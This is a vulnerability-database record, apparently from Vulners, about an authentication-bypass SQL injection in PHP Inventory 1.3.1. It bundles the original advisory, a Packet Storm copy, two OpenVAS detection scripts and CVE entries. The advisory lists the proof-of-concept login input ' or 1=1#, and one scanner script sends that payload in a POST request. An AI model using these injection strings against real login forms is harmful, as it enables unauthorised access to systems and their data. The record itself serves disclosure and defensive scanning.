{"id": "SECURITYVULNS:DOC:27388", "bulletinFamily": "software", "title": "PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability", "description": "Advisory: PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability\r\nAdvisory ID: INFOSERVE-ADV2011-08\r\nAuthor: Stefan Schurtz\r\nContact: security@infoserve.de\r\nAffected Software: Successfully tested on PHP Inventory 1.3.1\r\nVendor URL: http://www.phpwares.com/\r\nVendor Status: fixed\r\nCVE-ID: CVE-2009-4595,CVE-2009-4596,CVE-2009-4597\r\n\r\n==========================\r\nVulnerability Description\r\n==========================\r\n\r\nPHP Inventory is (still) prone to a SQL-Injection (Auth Bypass) vulnerability\r\n\r\n==================\r\nPoC-Exploit\r\n==================\r\n\r\nhttp://[target]/php-inventory/index.php \r\n\r\n// with 'magic_quotes_gpc = Off'\r\n\r\nUSER NAME = ' or 1=1#\r\n\r\nor\r\n\r\nUSER NAME = admin\r\nPASSWORD = ' or 1=1#\r\n\r\n=========\r\nSolution\r\n=========\r\n\r\nUpdate to the latest version 1.3.2\r\n\r\n====================\r\nDisclosure Timeline\r\n====================\r\n\r\n29-Nov-2011 - informed vendor (contact form)\r\n30-Nov-2011 - vendor fix\r\n\r\n========\r\nCredits\r\n========\r\n\r\nVulnerability found and advisory written by the INFOSERVE security team.\r\n\r\n===========\r\nReferences\r\n===========\r\n\r\nhttp://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-08.txt\r\nhttp://www.exploit-db.com/exploits/10370/\r\nhttp://secunia.com/advisories/37672/\r\n", "published": "2011-12-04T00:00:00", "modified": "2011-12-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27388", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2009-4597", "CVE-2009-4595", "CVE-2009-4596"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:43", "edition": 1, "viewCount": 71, "enchantments": {"score": {"value": 6.4, 
"vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4595", "CVE-2009-4596", "CVE-2009-4597"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310800983", "OPENVAS:1361412562310802534"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:107425"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12064"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2009-4595", "CVE-2009-4596", "CVE-2009-4597"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:107425"]}]}, "exploitation": null, "vulnersScore": 6.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"openvas": [{"lastseen": "2020-04-07T16:39:05", "description": "This host is running PHP inventory and is prone to multiple\n vulnerabilities.\n\n This NVT has been replaced by NVT PHP Inventory ", "cvss3": {}, "published": "2010-01-22T00:00:00", "type": "openvas", "title": "PHP Inventory Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-4597", "CVE-2009-4595", "CVE-2009-4596"], "modified": "2020-04-02T00:00:00", "id": "OPENVAS:1361412562310800983", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800983", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# PHP Inventory Multiple Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800983\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-01-22 16:43:14 +0100 (Fri, 22 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-4595\", \"CVE-2009-4596\", \"CVE-2009-4597\");\n script_name(\"PHP Inventory Multiple Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37672\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/54666\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/54667\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/10370\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to include arbitrary\n HTML or web scripts in the scope of the browser and allows to obtain and manipulate sensitive information.\");\n\n script_tag(name:\"affected\", value:\"PHP Inventory version 1.2 and prior.\");\n\n script_tag(name:\"insight\", value:\"The Multiple flaws due to,\n\n - Input passed via the 'user_id' parameter to 'index.php' and via the 'sup_id'\n parameter is not properly sanitised before being used in an SQL query.\n\n - Input passed via the 'user' and 'pass' form field to 'index.php' is not\n 
properly sanitised before being used in an SQL query.\");\n\n script_tag(name:\"solution\", value:\"Update to PHP Inventory version 1.3.2 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running PHP inventory and is prone to multiple\n vulnerabilities.\n\n This NVT has been replaced by NVT PHP Inventory 'user' and 'pass' Parameters\n SQL Injection Vulnerability (OID: 1.3.6.1.4.1.25623.1.0.802534).\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n script_xref(name:\"URL\", value:\"http://www.phpwares.com/content/php-inventory\");\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T19:10:44", "description": "This host is running PHP inventory and is prone to SQL injection\n vulnerability.", "cvss3": {}, "published": "2011-12-05T00:00:00", "type": "openvas", "title": "PHP Inventory 'user' and 'pass' Parameters SQL Injection Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-4597", "CVE-2009-4595", "CVE-2009-4596"], "modified": "2020-05-06T00:00:00", "id": "OPENVAS:1361412562310802534", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802534", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# PHP Inventory 'user' and 'pass' Parameters SQL Injection Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty 
of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802534\");\n script_version(\"2020-05-06T13:14:18+0000\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-4595\", \"CVE-2009-4596\", \"CVE-2009-4597\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 13:14:18 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-12-05 15:37:27 +0530 (Mon, 05 Dec 2011)\");\n script_name(\"PHP Inventory 'user' and 'pass' Parameters SQL Injection Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Dec/0\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/520692\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/107425/INFOSERVE-ADV2011-08.txt\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to include arbitrary\n HTML or web scripts in the scope of the browser and allows to obtain and manipulate sensitive information.\");\n\n script_tag(name:\"affected\", value:\"PHP Inventory version 1.3.1 and prior\");\n\n 
script_tag(name:\"insight\", value:\"The flaw is due to an input passed the to 'user' and 'pass' form field\n in 'index.php' is not properly sanitised before being used in an SQL query.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP Inventory version 1.3.2 or later\");\n\n script_tag(name:\"summary\", value:\"This host is running PHP inventory and is prone to SQL injection\n vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod\", value:\"50\"); # Vuln check below is quite unreliable\n script_xref(name:\"URL\", value:\"http://www.phpwares.com/content/php-inventory\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\n\nif( ! http_can_host_php( port:port ) ) exit( 0 );\n\nhost = http_host_name( port:port );\n\nforeach dir( make_list_unique( \"/\", \"/php-inventory\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/index.php\";\n\n variables = string(\"user=admin&pass=%27+or+1%3D1%23\");\n\n req = string( \"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(variables),\n \"\\r\\n\\r\\n\", variables );\n res = http_keepalive_send_recv( port:port, data:req );\n\n if( egrep( pattern:\"^HTTP/.* 302 Found\", string:res ) && \"Location: index.php\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:24", "description": "", "cvss3": {}, "published": "2011-11-30T00:00:00", "type": "packetstorm", "title": "PHP Inventory 1.3.1 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-4597", "CVE-2009-4595", "CVE-2009-4596"], "modified": "2011-11-30T00:00:00", "id": 
"PACKETSTORM:107425", "href": "https://packetstormsecurity.com/files/107425/PHP-Inventory-1.3.1-SQL-Injection.html", "sourceData": "`Advisory: PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability \nAdvisory ID: INFOSERVE-ADV2011-08 \nAuthor: Stefan Schurtz \nContact: security@infoserve.de \nAffected Software: Successfully tested on PHP Inventory 1.3.1 \nVendor URL: http://www.phpwares.com/ \nVendor Status: fixed \nCVE-ID: CVE-2009-4595,CVE-2009-4596,CVE-2009-4597 \n \n========================== \nVulnerability Description \n========================== \n \nPHP Inventory is (still) prone to a SQL-Injection (Auth Bypass) vulnerability \n \n================== \nPoC-Exploit \n================== \n \nhttp://[target]/php-inventory/index.php \n \n// with 'magic_quotes_gpc = Off' \n \nUSER NAME = ' or 1=1# \n \nor \n \nUSER NAME = admin \nPASSWORD = ' or 1=1# \n \n========= \nSolution \n========= \n \nUpdate to the latest version 1.3.2 \n \n==================== \nDisclosure Timeline \n==================== \n \n29-Nov-2011 - informed vendor (contact form) \n30-Nov-2011 - vendor fix \n \n======== \nCredits \n======== \n \nVulnerability found and advisory written by the INFOSERVE security team. 
\n \n=========== \nReferences \n=========== \n \nhttp://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-08.txt \nhttp://www.exploit-db.com/exploits/10370/ \nhttp://secunia.com/advisories/37672/ \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/107425/INFOSERVE-ADV2011-08.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2021-06-08T18:47:25", "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2011-12-05T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-4025", "CVE-2011-4357", "CVE-2011-4448", "CVE-2009-4597", "CVE-2009-4595", "CVE-2009-4596"], "modified": "2011-12-05T00:00:00", "id": "SECURITYVULNS:VULN:12064", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12064", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2022-03-23T21:39:50", "description": "SQL injection vulnerability in index.php in PHP Inventory 1.2 allows remote authenticated users to execute arbitrary SQL commands via the sup_id parameter in a suppliers details action. 
NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.", "cvss3": {}, "published": "2010-01-12T17:30:00", "type": "cve", "title": "CVE-2009-4595", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4595"], "modified": "2010-01-13T05:00:00", "cpe": ["cpe:/a:phpwares:php_inventory:1.2"], "id": "CVE-2009-4595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4595", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpwares:php_inventory:1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T21:39:50", "description": "Cross-site scripting (XSS) vulnerability in index.php in PHP Inventory 1.2 allows remote attackers to inject arbitrary web script or HTML via the sup_id parameter in a suppliers details action.", "cvss3": {}, "published": "2010-01-12T17:30:00", "type": "cve", "title": "CVE-2009-4596", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4596"], "modified": "2017-08-17T01:31:00", "cpe": 
["cpe:/a:phpwares:php_inventory:1.2"], "id": "CVE-2009-4596", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4596", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpwares:php_inventory:1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T21:39:50", "description": "Multiple SQL injection vulnerabilities in index.php in PHP Inventory 1.2 allow (1) remote authenticated users to execute arbitrary SQL commands via the user_id parameter in a users details action, and allow remote attackers to execute arbitrary SQL commands via the (2) user (username) and (3) pass (password) parameters. NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2010-01-12T17:30:00", "type": "cve", "title": "CVE-2009-4597", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4597"], "modified": "2017-08-17T01:31:00", "cpe": ["cpe:/a:phpwares:php_inventory:1.2"], "id": "CVE-2009-4597", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4597", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpwares:php_inventory:1.2:*:*:*:*:*:*:*"]}]}